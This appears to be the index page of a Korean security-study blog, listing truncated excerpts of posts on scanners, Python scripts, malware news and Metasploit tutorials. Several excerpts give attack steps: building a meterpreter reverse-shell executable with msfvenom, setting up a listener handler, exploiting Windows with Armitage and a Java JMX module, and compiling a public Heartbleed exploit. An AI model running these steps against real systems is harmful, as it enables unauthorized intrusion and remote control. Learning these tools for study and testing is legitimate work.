728x90 반응형 전체 글244 owasp zap tutorial :) owasp zap 은 owasp에서 오픈소스로 공개한 툴이다. 그럼 무엇을 하는 툴인가? 홈페이지나 서버를 본인 스스로 체크하고 점검해주는 오픈 소스이다. burp랑 비슷하지만 오픈소스라는 점에서 차이점이 있다. 그럼 owasp는 무엇인가 ? The Open Web Application Security Project 로 전 세계적으로 보안 전문가들이 보안 취약점 진단 기준과 표준을 수립하고, 웹 어플리케이션 보안 관련 문서를 배포하고 보안 취약점 관련 툴을 개발하는 오픈소스 커뮤니티이다. 공식 홈페이지는 https://www.owasp.org/index.php/Main_Page 여기이다. owasp zap의 사이트는 https://www.owasp.org/index.php/OWASP_Zed_Attack_.. Security Study/Web 2016. 12. 27. 0 랜섬웨어 걸리신 분들 :) 복구방법입니다.(ransomware) 랜섬웨어 걸리신 분들 한국 인터넷 진흥원에서 글을 읽어보아요:) 복구방법에 대해 설명되어있습니다.!! https://www.krcert.or.kr/ransomware/recovery.do Security News 2016. 12. 27. 0 PHPMailer-Exploit-Remote-Code_CVE-2016-10033 __ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhack.. Security News 2016. 12. 27. 0 netdiscover tutorial :) netdiscover 같은 경우에는 기본적으로 backtrack 5 나 kali 에 있는 network tool이다. netdiscover은 active / passive scanner이다. 사용방법을 한번 알아보자 . 기본적으로 netdiscover 만 입력해도 이렇게 뜨는 것을 알수있다. 좀더 구체적으로 사용하기위해 netdiscover -h 를 입력하면 도움말이나오는데 -r 옵션을 이용하여 대역대를 설정해줄수도 있다. Security Study/Network 2016. 12. 26. 0 Changes in Python 3.6 1. f string formatting (PEP 498) You can avoid the inconvenience of having to kill variables when using the .format () method or%. >>> lang = 'Python' >>> author = 'Guido van Rossum' >>> 'Language: {}, Author: {}'.format(lang, author) Language: Python, Author: Guido van Rossum >>> f'Language: {lang}, Author: {author}' Language: Python, Author: Guido van Rossum 2. Type hint (PEP 484) In 3.5, type.. Language 2016. 12. 24. 0 Hack windows XP with armitage in kali 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다. 다음은 service postgresql start 명령어를 실행시킨 후 service metasploit start 를 실행해준다. 다음은 armitage를 실행시킨다. 이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면 이러한 창이 뜬다. tab창에서 hosts -> add hosts 를 누르면 이렇게 victim IP를 입력할 수있도록 뜬다. 등록후 OS 를 알아보자 다시 host 탭에서 nmap scan -> quick scan(os detect)를 클릭하고 yes 그럼 콘솔창에 이러한 것을 확인할수 있다. 이제 취약점을 이용하여 공격하기 위해 어떠한.. Metasploit 2016. 12. 23. 0 how to change hostname (hostname 바꾸기 ) hostname이란? 연결된 장치의 이름을 말한다. 여기서 보면 parrotsec이란 것이 hostname 이다. hostname이란 명령어를 이용하여 일시적으로 변경이 가능하지만 /etc/hostname에서 변경을 하여 바꿀 수 있다. 두둥 :) Security Study/Linux 2016. 12. 23. 1 It’s Parliamentary: KeyBoy and the targeting of the Tibetan Community Key FindingsIn this report we track a malware operation targeting members of the Tibetan Parliament over August and October 2016.The operation uses known and patched exploits to deliver a custom backdoor known as KeyBoy.We analyze multiple versions of KeyBoy revealing a development cycle focused on avoiding basic antivirus detection.This operation is another example of a threat actor using “just.. Security News 2016. 12. 23. 0 Kali Linux by pass - Hack Windows metasploit tutorial 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22. 0 base 64 원하는 횟수만큼 decoding 하기 python (파일 넣어서) # -*- coding:utf-8 -*- import base64 f = open("")#파일 명 (경로) Buff = f.readlines() Buff = str(Buff) for x in range(0, 50): #50자리에 반복하고 싶은 횟수 Buff = base64.decodestring(Buff) print Buff Language 2016. 12. 22. 0 Hack windows with metasploit Java Applet JMX Remote Code Execution 모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지.. Metasploit 2016. 12. 22. 0 web server 취약점 스캐너 nikto :) 웹 서버 취약점 점검 툴인 nikto에 대해 알아보자 :) 공식 홈페이지는 https://cirt.net/Nikto2 이다 . 여기서 다운을 받을 수있고 설치를 할수 있다. 리눅스 같은경우 apt-get install nikto 와 yum install nikto 로 쉽게 받을 수있다. Mac OS같은 경우에는 brew install nikto 를 하면 쉽게 받을수있다 . 먼저 명령어를 보자 간단하게 터미널에서 nikto 만 치게 되면 도움말들이 나타나는 것을 알 수있다. 조금 더 자세히 알고 싶다면 nikto -Help 를 입력한다면 이렇게 많은 도움말을 볼수가 있다. nikto 의 사용법을 알아보면 nikto -h [HOST IP] 이렇게만 해도된다. 왜냐 기본적으로 포트는 80번이 디폴트 값을 지니.. Security Study/Web 2016. 12. 21. 0 individual bands of image.py from PIL import Imageimport numpy as np im = Image.open('heartbleed.png') # In this case, it's a 3-band (red, green, blue) image# so we'll unpack the bands into 3 separate 2D arrays.r, g, b = np.array(im).T # Let's make an alpha (transparency) band based on where blue is < 100a = np.zeros_like(b)a[b Language 2016. 12. 21. 0 RGB image analysis.py import numpy as npimport mpl_toolkits.mplot3d.axes3d as p3import matplotlib.pyplot as pltimport colorsysfrom PIL import Image # (1) Import the file to be analyzed!img_file = Image.open("sunset.jpg")img = img_file.load() # (2) Get image width & height in pixels[xs, ys] = img_file.sizemax_intensity = 100hues = {} # (3) Examine each pixel in the image filefor x in xrange(0, xs): for y in xrange(0, .. Language 2016. 12. 21. 0 image GPS.py from PIL import Imagefrom PIL.ExifTags import TAGS filename = "sunset.jpg"extension = filename.split('.')[-1]if (extension == 'jpg') | (extension == 'JPG') | (extension == 'jpeg') | (extension == 'JPEG') | (extension == 'PNG') |(extension == 'png'): try: img = Image.open(filename) info = img._getexif() exif = {} for tag, value in info.items(): decoded = TAGS.get(tag, tag) exif[decoded] = value #.. Language 2016. 12. 21. 0 base image.py from PIL import Image img = Image.open("filename.jpg")print(img.size)print(img.format) img.show() Language 2016. 12. 21. 0 Heartbleed :) 하트블리드 heartbleed 는 2015년 보안 취약점 중 대표적인 취약점이라 할수 있다. heartbleed 취약점은 공격자가 서버의 메모리의 일부분을 읽어 올 수 있는 openSSL의 취약점으로 요청할때 요청할 단어가 만약 aaa이면 3바이트를 요청하면 되는데 이 보다 더 큰 바이트인 500을 하게 된다면 aaa를 반환하고 남은 메모리를 다른 값으로 뱉어 주는 취약점을 말한다. 취약점을 실습해볼 때에는 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c여기서 다운을 받은 후 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 .. Metasploit 2016. 12. 21. 0 Pivoting kerberos golden tickets in Linux ’ Pivoting kerberos golden tickets in LinuxKerberos golden ticket allows attacker to establish persistent and covert authenticated access to Windows domain. The attack works as follows: Attacker gains administrator privileges in domainAttacker extracts ntlm hash of a domain user "krbtgt" and obtains SID of the target domainThe attacker forges kerberos ticketThis ticket is used to authenticate in.. Security News 2016. 12. 19. 0 python 같은 파일 뽑아내기 :) 사전파일에 파일이름과 폴더를 지정해주면 중복파일을 뽑아줍니다 :) # -*- coding: utf-8 -*- import os f = open('/Users/z3alous/Desktop/flag1.txt', 'w') Language 2016. 12. 18. 0 md5 한번에 인코딩하기 :) ex)폴더지정 # -*- coding: utf-8 -*-import hashlibimport os f = open('/Users/z3alous/Desktop/flag.txt', 'w') def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() for root, dirs, files in os.walk('폴더 경로'): for fname in files: full_fname = os.path.join(root, fname) f.write(md5(full_fname) + '\n') f.. Language 2016. 12. 18. 0 이전 1 2 3 4 5 6 7 ··· 13 다음 728x90 반응형